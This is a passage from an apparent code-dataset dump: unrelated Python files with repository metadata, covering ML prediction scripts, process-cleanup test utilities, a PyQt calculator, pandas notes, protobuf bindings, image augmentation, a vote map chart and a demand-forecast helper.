'Programming Language :: Python :: 3.8'
]
)
| 30.84 | 95 | 0.624514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 833 | 0.540208 |
906fe64b74d7a1e64be5829e3ead36fd43b1f23d | 1,361 | py | Python | src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | a24785da6b4d857200b819ad4d960885b1ef7a20 | [
"Apache-2.0"
]
| null | null | null | src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | a24785da6b4d857200b819ad4d960885b1ef7a20 | [
"Apache-2.0"
]
| null | null | null | src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | a24785da6b4d857200b819ad4d960885b1ef7a20 | [
"Apache-2.0"
]
| null | null | null | import csv
import joblib
from sklearn.metrics import accuracy_score
data = []
features = []
targets = []
feature_names = []
users = []
with open('satisfaction_feature_names.csv') as name_file:
column_name_file = csv.reader(name_file)
feature_names = next(column_name_file)[2:394]
with open('cza_satisfaction_train_0922.csv') as data_file:
csv_file = csv.reader(data_file)
idx = 0
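    # Only rows 10001-50000 of the CSV are used as the evaluation sample.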
for content in csv_file:
idx = idx + 1
if idx <= 10000:
continue
if idx > 50000:
break
content = content[:2] + list(map(float, content[2:]))
if len(content) != 0:
data.append(content)
features.append(content[2:394])
targets.append(content[-1])
users.append(content[1])
clf, sorted_feature_scores = joblib.load("cza_rf.pkl")
predict_result = clf.predict(features)
print(sorted_feature_scores)
print(accuracy_score(predict_result, targets))
result = list(zip(users, predict_result))
print(result[:10])
print(sum(predict_result))
print(sum([flag[1] for flag in result]))
with open("rf_predict_result.csv", "w", encoding="UTF-8") as w_file:
result_file = csv.writer(w_file)
for idx, row in enumerate(result):
if idx > 10:
break
row = list(row)
row.insert(0, 20200928)
result_file.writerow(row)
| 27.22 | 68 | 0.648788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.080823 |
9070d5bf65f2cf491385a39c1e6e52e356fd0952 | 573 | py | Python | py/test.py | BEARUBC/grasp-kernel | ea2c9b698a2c457e798eff909941dc6e7c852bb2 | [
"Apache-2.0"
]
| 1 | 2021-05-31T22:05:10.000Z | 2021-05-31T22:05:10.000Z | py/test.py | BEARUBC/grasp-kernel-wrapper | ea2c9b698a2c457e798eff909941dc6e7c852bb2 | [
"Apache-2.0"
]
| null | null | null | py/test.py | BEARUBC/grasp-kernel-wrapper | ea2c9b698a2c457e798eff909941dc6e7c852bb2 | [
"Apache-2.0"
]
| 1 | 2021-05-31T18:54:55.000Z | 2021-05-31T18:54:55.000Z | class TestClass:
def __init__(self, list, name):
self.list = list
self.name = name
def func1():
print("func1 print something")
def func2():
print("func2 print something")
integer = 8
return integer
def func3():
print("func3 print something")
s = "func3"
return s
def func4():
print("func4 print something")
listIntegers = [1,2,3,4,5]
return listIntegers
def func5():
print("func5 print something")
listStrings = ["a","b","c","d","e"]
return listStrings
print("Hello World")
# test = TestClass()
| 18.483871 | 39 | 0.612565 | 102 | 0.17801 | 0 | 0 | 0 | 0 | 0 | 0 | 170 | 0.296684 |
9070ee6ae571936274c18044e8321cc9866dd425 | 2,836 | py | Python | tests/utils/_process_nonwin.py | chrahunt/quicken | 2dd00a5f024d7b114b211aad8a2618ec8f101956 | [
"MIT"
]
| 3 | 2019-11-12T17:56:08.000Z | 2022-03-12T03:43:10.000Z | tests/utils/_process_nonwin.py | chrahunt/quicken | 2dd00a5f024d7b114b211aad8a2618ec8f101956 | [
"MIT"
]
| 47 | 2018-12-10T04:08:58.000Z | 2022-03-20T14:54:36.000Z | tests/utils/_process_nonwin.py | chrahunt/quicken | 2dd00a5f024d7b114b211aad8a2618ec8f101956 | [
"MIT"
]
| 1 | 2019-11-12T17:55:17.000Z | 2019-11-12T17:55:17.000Z | """Utilities for managing child processes within a scope - this ensures
tests run cleanly even on failure and also gives us a mechanism to
get debug info for our children.
"""
import logging
import os
import sys
from contextlib import contextmanager
from typing import ContextManager, List
import psutil
import process_tracker
process_tracker.install()
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
__all__ = [
"active_children",
"contained_children",
"disable_child_tracking",
"kill_children",
]
def _get_create_time(create_time):
"""Given basic process create time, return one that would
match psutil.
"""
boot_time = psutil.boot_time()
clock_ticks = os.sysconf("SC_CLK_TCK")
return boot_time + (create_time / clock_ticks)
def active_children() -> List[psutil.Process]:
"""Returns the active child processes.
"""
out = []
children = process_tracker.children()
for pid, create_time in children:
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
continue
else:
if process.create_time() == _get_create_time(create_time):
out.append(process)
return out
@contextmanager
def contained_children(timeout=1, assert_graceful=True) -> ContextManager:
"""Automatically kill any Python processes forked in this context, for
cleanup. Handles any descendants.
Timeout is seconds to wait for graceful termination before killing children.
"""
try:
# TODO: What to yield here?
yield
finally:
alive = kill_children(timeout)
num_alive = len(alive)
# Get current exception - if something was raised we should be raising
# that.
# XXX: Need to check use cases to see if there are any cases where
# we are expecting an exception outside of the 'contained_children'
# block.
_, exc, _ = sys.exc_info()
if assert_graceful and exc is None:
assert not num_alive, f"Unexpected children still alive: {alive}"
def disable_child_tracking():
# TODO: Actually needed?
pids = [p.pid for p in active_children()]
return pids
def kill_children(timeout=1) -> List[psutil.Process]:
"""
Kill any active children, returning any that were not terminated within
timeout.
Args:
timeout: time to wait before killing.
Returns:
list of processes that had to be killed forcefully.
"""
procs = active_children()
for p in procs:
try:
p.terminate()
except psutil.NoSuchProcess:
pass
gone, alive = psutil.wait_procs(procs, timeout=timeout)
for p in alive:
logger.warning("Cleaning up child: %d", p.pid)
p.kill()
return alive
| 26.504673 | 80 | 0.665374 | 0 | 0 | 841 | 0.296544 | 857 | 0.302186 | 0 | 0 | 1,157 | 0.407969 |
9071096add8b5a4db338073c96e92750aa128c1f | 2,516 | py | Python | data/meneame/parse_meneame.py | segurac/DeepQA | b7f95e6e14ba9469f17a2a43df87f2a69e431eeb | [
"Apache-2.0"
]
| null | null | null | data/meneame/parse_meneame.py | segurac/DeepQA | b7f95e6e14ba9469f17a2a43df87f2a69e431eeb | [
"Apache-2.0"
]
| null | null | null | data/meneame/parse_meneame.py | segurac/DeepQA | b7f95e6e14ba9469f17a2a43df87f2a69e431eeb | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2016 Carlos Segura. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import sys
import gzip
parents = {}
conversations = []
samples = {}
class Sample:
comentario_id = None
parent_id = []
    comentario = ''
comentario_id = None
parent_id = []
with gzip.open(sys.argv[1]) as f:
for line in f:
try:
line = line.decode('utf-8').strip()
#print(line)
splitted_line = line.split()
if len(splitted_line) == 0:
continue
head = splitted_line[0]
rest = splitted_line[1:]
if head == 'comentario_id:':
comentario_id = rest[0]
parent_id = []
if head == 'parent_id:':
parent_id.append(rest[0])
if head == 'comentario:':
comentario = rest
if len(comentario) == 0:
comentario_id = None
parent_id = []
continue
#Store this comment in parents dictionary
if comentario_id is not None:
sample = Sample()
sample.comentario_id = comentario_id
sample.parent_id = parent_id
sample.comentario = comentario
samples[comentario_id] = sample
comentario_id = None
parent_id = []
except:
continue
for k in samples:
sample = samples[k]
for parent in sample.parent_id:
if parent in samples:
qa = [samples[parent].comentario, sample.comentario]
conversations.append(qa)
for conversation in conversations:
print('********************************************')
for frase in conversation:
print(*frase)
| 27.955556 | 79 | 0.534181 | 72 | 0.028617 | 0 | 0 | 0 | 0 | 0 | 0 | 860 | 0.341812 |
90740254e2ea619dbf9f847e862986ac065aaf0a | 4,087 | py | Python | dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | ab69d578a981ad0262f76baeccb5d16e8d2e182a | [
"Apache-2.0"
]
| null | null | null | dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | ab69d578a981ad0262f76baeccb5d16e8d2e182a | [
"Apache-2.0"
]
| null | null | null | dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | ab69d578a981ad0262f76baeccb5d16e8d2e182a | [
"Apache-2.0"
]
| null | null | null | import unittest
import pandas as pd
import git
import os
from dfstools import get_dataset_dtypes
from dfstools import find_related_cols_by_name
from dfstools import find_related_cols_by_content
from dfstools import find_parent_child_relationships
from dfstools import pecan_cookies_load_data
class RelationshipTools(unittest.TestCase):
def test_get_dataset_dtypes(self):
expected = {'airlines': {'carrier': {'dtype': 'O'}},
'airports': {'dest': {'dtype': 'O'}},
'flights': {'dest': {'dtype': 'O'}, 'carrier': {'dtype': 'O'},'flight_id': {'dtype': 'O'}},
'trip_logs': {'flight_id': {'dtype': 'O'}}}
result = get_dataset_dtypes(None)
self.assertEqual(expected, result)
expected = {
'airlines': {'carrier': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.carrier': {}}]}},
'airports': {'dest': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.dest': {}}]}},
'flights': {'dest': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airports.dest': {}}]},
'carrier': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airlines.carrier': {}}]},
'flight_id': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'trip_logs.flight_id': {}}]}},
'trip_logs': {'flight_id': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'flights.flight_id': {}}]}}}
data = os.path.join(git.Repo('.', search_parent_directories=True).working_tree_dir, 'data')
dataframe_dict = {'airlines': pd.read_csv(os.path.join(data, 'airlines', 'airlines.csv')),
'flights': pd.read_csv(os.path.join(data, 'flights', 'flights.csv')),
'airports': pd.read_csv(os.path.join(data, 'airports', 'airports.csv'))}
result = find_related_cols_by_name(dataframe_dict, result)
self.assertEqual(expected, result)
def test_find_related_cols_by_content(self):
# ---pecan cookies sprint one test case---
expected = {
'airports': {'dest': {'relationships': ['flights.origin', 'flights.dest']},
'dest_city': {'relationships': ['flights.origin_city']},
'dest_state': {'relationships': ['flights.origin_state']}},
'airlines': {'carrier': {'relationships': ['flights.carrier']}},
"flights": {
"flight_id": {"relationships": []},
"origin": {"relationships": ["airports.dest"]},
"origin_city": {"relationships": ["airports.dest_city"]},
"origin_state": {"relationships": ["airports.dest_state"]},
"dest": {"relationships": ["airports.dest"]},
"distance_group": {"relationships": []},
"carrier": {"relationships": ["airlines.carrier"]},
"flight_num": {"relationships": []},
"first_trip_logs_time": {"relationships": []}}
}
data_list = pecan_cookies_load_data()
result = find_related_cols_by_content(data_list)
self.assertEqual(expected, result)
#result = find_parent_child_relationships(None, result)
#self.assertEqual(expected, result)
if __name__ == '__main__':
unittest.main()
| 49.841463 | 111 | 0.477857 | 3,743 | 0.915831 | 0 | 0 | 0 | 0 | 0 | 0 | 1,447 | 0.354049 |
907488d52d48e24b4d69fb2af57f6618dc2c3ce3 | 2,836 | py | Python | Calculator.py | KunalKatiyar/Calculator | 74044d32b08738ef288ccfae6bb322e6ab05f608 | ["MIT"] | null | null | null | Calculator.py | KunalKatiyar/Calculator | 74044d32b08738ef288ccfae6bb322e6ab05f608 | ["MIT"] | null | null | null | Calculator.py | KunalKatiyar/Calculator | 74044d32b08738ef288ccfae6bb322e6ab05f608 | ["MIT"] | null | null | null |
import sys
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QGroupBox, QDialog, QVBoxLayout, QGridLayout, QMainWindow, QAction, QLineEdit, QMessageBox
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
class App(QDialog):
def __init__(self):
super().__init__()
self.title = 'Calculator'
self.left = 10
self.top = 10
self.width = 640
self.height = 480
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.createGridLayout()
windowLayout = QVBoxLayout()
windowLayout.addWidget(self.horizontalGroupBox)
self.setLayout(windowLayout)
self.textbox = QLineEdit(self)
self.textbox.move(20, 40)
self.textbox.resize(600,35)
# Original Approach
# buttonp = QPushButton('+', self)
# buttonp.setToolTip('Addition Operator')
# buttonp.move(100,70)
# buttonp.clicked.connect(self.on_click)
# buttonm = QPushButton('-', self)
# buttonm.setToolTip('Subtraction Operator')
# buttonm.move(100,100)
# buttonm.clicked.connect(self.on_click)
self.show()
def createGridLayout(self):
self.horizontalGroupBox = QGroupBox("Grid")
layout = QGridLayout()
# layout.setColumnStretch(1, 2)
# layout.setColumnStretch(2, 4)
layout.addWidget(QPushButton('1'),0,0)
layout.addWidget(QPushButton('2'),0,1)
layout.addWidget(QPushButton('3'),0,2)
layout.addWidget(QPushButton('4'),1,0)
layout.addWidget(QPushButton('5'),1,1)
layout.addWidget(QPushButton('6'),1,2)
layout.addWidget(QPushButton('7'),2,0)
layout.addWidget(QPushButton('8'),2,1)
layout.addWidget(QPushButton('9'),2,2)
layout.addWidget(QPushButton('0'),3,1)
layout.addWidget(QPushButton('.'),3,0)
layout.addWidget(QPushButton('='),3,2)
layout.addWidget(QPushButton('+'),0,4)
layout.addWidget(QPushButton('-'),1,4)
layout.addWidget(QPushButton('*'),2,4)
layout.addWidget(QPushButton('/'),3,4)
self.horizontalGroupBox.setLayout(layout)
# @pyqtSlot()
# def on_click(self):
# print('Button click')
@pyqtSlot()
def on_click(self):
textboxValue = "Good"
QMessageBox.question(self, 'Message - pythonspot.com', "You typed: " + textboxValue, QMessageBox.Ok, QMessageBox.Ok)
self.textbox.setText("Good")
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_()) | 35.45 | 203 | 0.605783 | 2,441 | 0.860719 | 0 | 0 | 231 | 0.081453 | 0 | 0 | 561 | 0.197814 |
9074ea5b2e3ca5610b7441955b3420b7ffce9518 | 1,446 | py | Python | analysis/src/util/_concepts.py | Domiii/code-dbgs | afe4d500273570e0b141ca0384cda3b52a191417 | ["Apache-2.0"] | 95 | 2020-01-20T08:51:20.000Z | 2022-03-31T23:27:28.000Z | analysis/src/util/_concepts.py | Domiii/code-dbgs | afe4d500273570e0b141ca0384cda3b52a191417 | ["Apache-2.0"] | 274 | 2020-07-11T11:10:10.000Z | 2022-03-31T14:03:39.000Z | analysis/src/util/_concepts.py | Domiii/code-dbgs | afe4d500273570e0b141ca0384cda3b52a191417 | ["Apache-2.0"] | 9 | 2020-07-15T07:04:20.000Z | 2022-03-27T17:11:58.000Z |
# // ###########################################################################
# // Queries
# // ###########################################################################
# -> get a single cell of a df (use `iloc` with `row` + `col` as arguments)
df.iloc[0]['staticContextId']
# -> get one column as a list
allFunctionNames = staticContexts[['displayName']].to_numpy().flatten().tolist()
# -> get all rows that match a condition
callLinked = staticTraces[~staticTraces['callId'].isin([0])]
# -> exclude columns
df.drop(['A', 'B'], axis=1)
# -> complex queries
staticTraces.query(f'callId == {callId} or resultCallId == {callId}')
# -> join queries (several examples)
# https://stackoverflow.com/a/40869861
df.set_index('key').join(other.set_index('key'))
B.query('client_id not in @A.client_id')
B[~B.client_id.isin(A.client_id)]
# merging dfs
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.merge.html
pd.merge(df1, df2, on=['A', 'B'])
df1.merge(df2, left_on='lkey', right_on='rkey')
# // ###########################################################################
# // Display
# // ###########################################################################
# -> display a groupby object (https://stackoverflow.com/questions/22691010/how-to-print-a-groupby-object)
groups = df.groupby('A')
for key, item in groups:
group = groups.get_group(key)
display(group)
# .to_numpy().flatten().tolist() | 34.428571 | 106 | 0.540111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 996 | 0.688797 |
907638a652d8418902c98ee951701aa5ff8b7dc1 | 2,279 | py | Python | src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 1a8639d6f2a2535ece30dde840c99ba8261b5d7d | ["MIT"] | null | null | null | src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 1a8639d6f2a2535ece30dde840c99ba8261b5d7d | ["MIT"] | null | null | null | src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 1a8639d6f2a2535ece30dde840c99ba8261b5d7d | ["MIT"] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: v3/diff/UniversalDiff.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from v3.diff import Transaction_pb2 as v3_dot_diff_dot_Transaction__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='v3/diff/UniversalDiff.proto',
package='v3.diff',
syntax='proto3',
serialized_pb=_b('\n\x1bv3/diff/UniversalDiff.proto\x12\x07v3.diff\x1a\x19v3/diff/Transaction.proto\";\n\rUniversalDiff\x12*\n\x0ctransactions\x18\x01 \x03(\x0b\x32\x14.v3.diff.Transactionb\x06proto3')
,
dependencies=[v3_dot_diff_dot_Transaction__pb2.DESCRIPTOR,])
_UNIVERSALDIFF = _descriptor.Descriptor(
name='UniversalDiff',
full_name='v3.diff.UniversalDiff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transactions', full_name='v3.diff.UniversalDiff.transactions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=67,
serialized_end=126,
)
_UNIVERSALDIFF.fields_by_name['transactions'].message_type = v3_dot_diff_dot_Transaction__pb2._TRANSACTION
DESCRIPTOR.message_types_by_name['UniversalDiff'] = _UNIVERSALDIFF
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
UniversalDiff = _reflection.GeneratedProtocolMessageType('UniversalDiff', (_message.Message,), dict(
DESCRIPTOR = _UNIVERSALDIFF,
__module__ = 'v3.diff.UniversalDiff_pb2'
# @@protoc_insertion_point(class_scope:v3.diff.UniversalDiff)
))
_sym_db.RegisterMessage(UniversalDiff)
# @@protoc_insertion_point(module_scope)
| 31.219178 | 203 | 0.777095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 635 | 0.278631 |
9076fc2a93a37415e1783c15ba456852ac6cdab0 | 4,549 | py | Python | src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | ["MIT"] | 2 | 2022-03-28T09:46:38.000Z | 2022-03-28T14:12:32.000Z | src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | ["MIT"] | null | null | null | src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import annotations
import numpy as np
import torch
from torch import Tensor
from onevision.data.augment.base import BaseAugment
from onevision.data.augment.utils import apply_transform_op
from onevision.data.data_class import ObjectAnnotation
from onevision.factory import AUGMENTS
__all__ = [
"ImageBoxAugment",
]
# MARK: - Modules
@AUGMENTS.register(name="image_box_augment")
class ImageBoxAugment(BaseAugment):
r"""
Args:
policy (str):
Augmentation policy. One of: [`scratch`, `finetune`].
Default: `scratch`.
"""
cfgs = {
"scratch": [
# (op_name, p, magnitude)
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.5, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
"finetune": [
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.8, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
}
# MARK: Magic Functions
def __init__(self, policy: str = "scratch", *args, **kwargs):
        super().__init__(*args, **kwargs)
        if policy not in self.cfgs:
            raise ValueError(f"`policy` must be one of: {self.cfgs.keys()}."
                             f" But got: {policy}")
        # Store the policy name; __repr__ below reports self.policy.
        self.policy     = policy
        self.transforms = self.cfgs[policy]
def __repr__(self) -> str:
return self.__class__.__name__ + \
f"(policy={self.policy}, fill={self.fill})"
# MARK: Configure
def _augmentation_space(self, *args, **kwargs) -> dict[str, tuple[Tensor, bool]]:
pass
# MARK: Forward Pass
def forward(self, input: np.ndarray, target: np.ndarray) -> tuple[np.ndarray, np.ndarray]:
"""
Args:
input (np.ndarray):
Image to be transformed.
target (np.ndarray[*, 4):
Target to be transformed. Boxes in (x, y, x, y) format.
"""
# NOTE: Transform
transform_id = int(torch.randint(len(self.transforms), (1,)).item())
num_ops = len(self.transforms[transform_id])
probs = torch.rand((num_ops,))
for i, (op_name, p, magnitude) in enumerate(self.transforms[transform_id]):
if probs[i] > p:
continue
magnitude = magnitude if magnitude is not None else 0.0
if op_name == "image_box_random_perspective":
"""
target[:, 2:6] = box_cxcywh_norm_to_xyxy(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
nl = len(target) # Number of labels
if nl:
target = target
else:
target = np.zeros((nl, ObjectAnnotation.box_label_len()))
"""
target[:, 2:6] = box_xyxy_to_cxcywh_norm(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
else:
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
'''
elif op_name == "adjust_hsv":
input = adjust_hsv(
input,
h_factor = magnitude[0],
s_factor = magnitude[1],
v_factor = magnitude[2],
)
elif op_name == "hflip":
input = np.fliplr(input)
target[:, 2] = 1 - target[:, 2]
elif op_name == "vflip":
input = np.flipud(input)
target[:, 3] = 1 - target[:, 3]
'''
return input, target
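# A minimal usage sketch (illustrative, not part of the original module): build the
# augment directly and apply it to an image / box-label pair, where `image` is an
# HWC numpy array and `target` has one row of box labels per object.
#
#   aug = ImageBoxAugment(policy="scratch")
#   image_aug, target_aug = aug.forward(image, target)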
| 32.726619 | 94 | 0.473071 | 4,088 | 0.898659 | 0 | 0 | 4,133 | 0.908551 | 0 | 0 | 1,770 | 0.389097 |
907746020f32a1228d26593b0db9dbd5b8907c24 | 2,087 | py | Python | dataviz/euvotes.py | Udzu/pudzu | 5a0302830b052fc54feba891eb7bf634957a9d90 | ["MIT"] | 119 | 2017-07-22T15:02:30.000Z | 2021-08-02T10:42:59.000Z | dataviz/euvotes.py | Udzu/pudzu | 5a0302830b052fc54feba891eb7bf634957a9d90 | ["MIT"] | null | null | null | dataviz/euvotes.py | Udzu/pudzu | 5a0302830b052fc54feba891eb7bf634957a9d90 | ["MIT"] | 28 | 2017-08-04T14:28:41.000Z | 2019-11-27T23:46:14.000Z |
from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import seaborn as sns
# generate map
df = pd.read_csv("datasets/euvotes.csv").set_index('country')
palette = tmap(RGBA, sns.cubehelix_palette(11, start=0.2, rot=-0.75))
ranges = [20000000,10000000,5000000,2000000,1000000,500000,200000,100000,0]
def votecolfn(n):
return palette[8 - next(i for i,x in enumerate(ranges) if n >= x)]
def colorfn(c):
if c not in df.index:
return "white" if c in ['Sea', 'Borders'] else "grey"
return votecolfn(int(df.loc[c].votes))
def labelfn(c):
if c not in df.index: return None
dfc = df.loc[c]
label = "{name} '{year}\n({votes:.2g}M)".format(name=dfc.leader.split(" ")[-1], year=dfc.year[2:], votes=int(dfc.votes) / 1000000)
return Image.from_text(label, arial(14, bold=True), align="center", padding=2)
map = map_chart("maps/Europe.png", colorfn, labelfn)
# legend
def box(c):
return Image.new("RGBA", (30, 30), c).place(Image.from_text("", arial(16, bold=True), "black", bg=c))
vote_arr = Image.from_array([
[box(votecolfn(n)), Image.from_text("<0.1M" if n < 100000 else ">{:.2g}M".format(n/1000000), arial(16), padding=(10,0))] for n in ranges
], bg="white", xalign=0)
vote_leg = Image.from_column([Image.from_text("# votes", arial(16, bold=True)), vote_arr], bg="white", xalign=0, padding=(0,5))
note_leg = Image.from_text("Multi-party national elections for executive head or party.", arial(16), max_width=100, bg="white", padding=(0,2))
legend = Image.from_column([vote_leg, note_leg], bg="white", xalign=0, padding=5).pad(1, "black")
chart = map.place(legend, align=(1,0), padding=10)
title = Image.from_column([
Image.from_text("EUROPEAN POPULAR VOTE RECORDS", arial(48, bold=True)),
Image.from_text("candidate or party with the highest absolute popular vote", arial(36))],
bg="white")
img = Image.from_column([title, chart], bg="white", padding=2)
img.place(Image.from_text("/u/Udzu", font("arial", 16), fg="black", bg="white", padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/euvotes.png")
| 44.404255 | 148 | 0.684236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 438 | 0.209871 |
9078e83afbdbc37dbf8bc13a26fcecb893de7fcb | 6,264 | py | Python | WarmUpSTE.py | jrolf/jse-api | 72cf6ce9f5fb54564872795f058cb06afe34ca75 | ["MIT"] | 1 | 2019-09-19T23:20:57.000Z | 2019-09-19T23:20:57.000Z | WarmUpSTE.py | jrolf/jse-api | 72cf6ce9f5fb54564872795f058cb06afe34ca75 | ["MIT"] | 1 | 2019-09-19T23:24:38.000Z | 2019-09-19T23:24:38.000Z | WarmUpSTE.py | jrolf/jse-api | 72cf6ce9f5fb54564872795f058cb06afe34ca75 | ["MIT"] | 1 | 2019-09-19T20:12:10.000Z | 2019-09-19T20:12:10.000Z |
import pandas as pd
import numpy as np
from copy import *
from bisect import *
from scipy.optimize import curve_fit
from sklearn.metrics import *
from collections import defaultdict as defd
import datetime,pickle
from DemandHelper import *
import warnings
warnings.filterwarnings("ignore")
#################################################################
#################################################################
#################################################################
class DemandForecastModel:
def __init__(self,rank_model='',forecast='',rmodel_beta=1.0,final_beta=1.0):
if rank_model != '':
self.ingest(rank_model,forecast,rmodel_beta,final_beta)
def ingest(self,rank_model,forecast,rmodel_beta=1.0,final_beta=1.0):
self.rank_model = rank_model
self.rmodel_beta = rmodel_beta
self.forecast = forecast
self.final_beta = final_beta
self.alldates = sorted(forecast.index)
def predict(self,rank=10000,date='2018-07-04',buybox=100):
if 'str' not in str(type(date)): date = str(date)[:10]
pred1 = self.rank_model.predict([rank])[0]
pred2 = pred1*self.rmodel_beta
d = self.forecast.loc[date]
mid,lo,hi = d['yhat'],d['yhat_lower'],d['yhat_upper']
rdr_preds = np.array([lo,mid,hi])
pred3 = pred2*rdr_preds
pred4 = pred3*self.final_beta
pred5 = global2local(pred4,buybox)
return pred5
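# Sketch of how this class is typically assembled (illustrative names): `rank_model`
# is any fitted regressor exposing .predict([rank]), and `forecast` is a DataFrame
# indexed by date with yhat / yhat_lower / yhat_upper columns (e.g. a Prophet output):
#   dfm = DemandForecastModel(rank_model, forecast)
#   preds = dfm.predict(rank=2500, date='2018-07-04', buybox=100)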
#################################################################
#################################################################
# Export a fitted model to text file:
# These filenames normally end in '.pkl'
def ExportModel(filename,model_object):
pickle.dump(model_object, open(filename, 'wb'))
print('Model Saved TO: '+filename)
# Import a fitted model from text file:
# These filenames normally end in '.pkl'
def ImportModel(filename):
model_object = pickle.load(open(filename, 'rb'))
print('Model Imported FROM: '+filename)
return model_object
def GetToday():
today = datetime.datetime.today()
return str(today)[:10]
#################################################################
#################################################################
#################################################################
short2long = {
'H&G' : 'Home & Garden',
'L&G' : 'Lawn & Garden',
'SPORTS' : 'Sports & Outdoors',
'HI' : 'Home Improvement',
'TOY' : 'Toys & Games',
'KIT' : 'Home & Kitchen',
}
long2short = {}
for short in sorted(short2long):
long2short[short2long[short]] = short
Shorts = sorted(short2long)
Longs = sorted(long2short)
def ConvertToShort(thing):
if thing in long2short: return long2short[thing]
return thing
Models2 = {}
for SH in Shorts:
fn = 'MODELS/'+SH+'/DFM2.pkl'
model = ImportModel(fn)
Models2[SH] = model
AllDates = sorted(set([str(a)[:10] for a in Models2['H&G'].alldates]))
#################################################################
#################################################################
# Returns a list of valid category names:
def GetCategories2():
return sorted(long2short)
# SPREETAIL DEMAND PREDICTION:
# cat : Category (String or List)
# rank : Sales Rank (Integer, 2-List, Long-List)
# date1 : First Date of Forecast ("2018-09-03")
# date2 : Final Date of Forecast OR # Days Forward ("2018-10-03" or 30)
# bb_ratio : BuyBox Percent (100.0)
# md_ratio : Marketplace Distribution Percent
def SpreetailPredict(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
if (not date1) or (str(date1).lower()=='today'): date1 = GetToday()
index1 = bisect_left(AllDates,date1)
if len(str(date2)) >10: date2 = str(date2)[:10]
if len(str(date2))==10: index2 = bisect_left(AllDates,date2)
else: index2 = index1+int(date2)
index_dif = abs(index2-index1)
index1 = min([index1,index2])
index2 = index1+index_dif
DateRange = AllDates[index1:index2+1]
LEN = len(DateRange)
#--------------------------------------
tdf = pd.DataFrame()
tdf['DATE'] = DateRange
#--------------------------------------
if 'list' in str(type(cat)):
cat = [ConvertToShort(a) for a in cat]
if len(cat)==LEN: tdf['CAT'] = cat
else: tdf['CAT'] = cat[0]
else: tdf['CAT'] = ConvertToShort(cat)
